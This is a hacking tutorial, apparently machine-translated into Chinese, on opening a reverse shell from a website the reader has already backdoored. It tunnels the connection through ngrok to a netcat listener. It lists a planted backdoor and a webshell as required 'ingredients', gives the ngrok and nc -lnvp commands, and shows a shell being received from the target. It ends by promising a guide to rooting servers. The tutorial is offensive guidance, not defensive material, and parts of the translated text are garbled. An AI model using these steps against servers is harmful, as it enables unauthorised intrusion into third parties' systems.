反向连接或反向外壳通常是在我们想根服务器以获得“root”访问权限时完成的。但您需要记住,并非所有网站/服务器都可以进行反向连接。但是如果我们尝试一下也无妨。
在本文中,我将讨论的不是如何“生根服务器”,而是我们如何利用Ngrok进行反向连接。要开始peraktik,请先在官方网站上下载Ngrok。
所需成分:
- Ngrok (根据您的计算机/笔记本电脑的操作系统下载)
- 已植入巴克多的网站
- 支持“perl”的服务器是必不可少的
- 具有反向连接功能的Web外壳
如果您已经准备好了上述所有材料,现在是时候开始开发实践了,如果您没有帐户来验证 ngrok 令牌,请先登录或在此处注册。
Ngrok安装
有关如何安装,它列在 ngrok 下载页面上。因此,您只需要遵循Ngrok推荐的方法即可。现在,它仍然只是对令牌进行身份验证,以便可以运行 Ngrok。
ngrok authtoken 1zmlm6ea3uU1Kleo8MzPSvV36la_7pEBaDCWxxxxxxxxxxxx
或者,如果不清楚,请访问链接:https://dashboard.ngrok.com/get-started/setup
Ngrok配置
然后接下来运行 ngrok tcp,根据需要使用端口。
ngrok tcp 31337
ngrok by @inconshreveable (Ctrl+C to quit) Session Status online Account zidansec@gmail.com (Plan: Free) Version 2.3.40 Region United States (us) Web Interface http://127.0.0.1:4040 Forwarding tcp://0.tcp.ngrok.io:11305 -> localhost:31337 Connections ttl opn rt1 rt5 p50 p90 1 0 0.01 0.00 0.00 0.00
如果 ngrok 进展顺利,那么它看起来像那样。
Netcat配置
当我们想要做反向连接服务器时,Netcat起着非常重要的作用,如果您是linux用户,netcat会自动安装“nc”命令。如果您是窗口用户,则必须首先在此处安装 netcat。由于我使用的是 Linux,那么我将以 Linux 操作系统用户的身份继续本教程。
nc -lnvp 31337
对于 netcat 配置中的端口,请将其调整为您之前运行队列时使用的端口。在这里,我将端口“31337”用于 Ngrok 和 Netcat 配置。
如何反向连接服务器
正确配置 ngrok 和 netcat 后,现在可以执行了。访问你的 backdor,请记住,您正在使用的 webshell 必须具有“反向连接”功能,如果您没有它,您可以使用我上面分享的 webshell。
然后在您正在使用的 webshell 上单击反向连接工具,如果在我上面共享的工具上显示“网络”,那么在服务器上您填写您的转发 ngrok 例如 0.tcp.ngrok.io,对于您填写的端口,porwarding port ngrok 有示例 11305,对于反向连接方法,您可以选择 perl(如果有)。如果没有,你可以使用c,python,php或其他东西。然后单击提交按钮。
然后检查netcat,如果Bckconnect成功,那么它将看起来像这样:
┌─[zidan@ubuntu] ∞ [~]>
└─[$]> nc -lnvp 31337
Listening on 0.0.0.0 31337
Connection received on 127.0.0.1 50912
sh: cannot set terminal process group (3715): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.0$
现在我们尝试运行 uname -a 命令来查看目标服务器使用的操作系统信息,或者您可以使用其他命令进行测试。
如果您想在目标服务器上拥有完全访问权限,只需生根服务器,但是我们可以利用的服务器获得完全访问权限的情况非常罕见。下次我会让你如何根服务器。这就是这次的全部教育。